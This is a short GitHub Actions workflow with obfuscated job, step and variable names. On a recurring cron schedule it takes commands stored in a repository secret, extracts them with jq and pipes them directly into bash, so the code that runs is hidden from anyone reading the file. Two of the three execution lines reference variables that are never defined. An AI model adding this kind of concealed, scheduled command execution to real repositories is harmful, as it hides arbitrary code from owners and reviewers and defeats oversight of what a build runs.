name: zhonghutu1056
on:
  workflow_dispatch:
  schedule:
    - cron: '6 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhonghutu1056
        env:
          a31356: ${{ secrets.a31356 }}
        run: |
          echo $a31356 | jq -r .thcd4 | /bin/bash
          echo $bj7 | jq -r .eget7737 | /bin/bash
          echo $uyxsn8250 | jq -r .nq77734 | /bin/bash

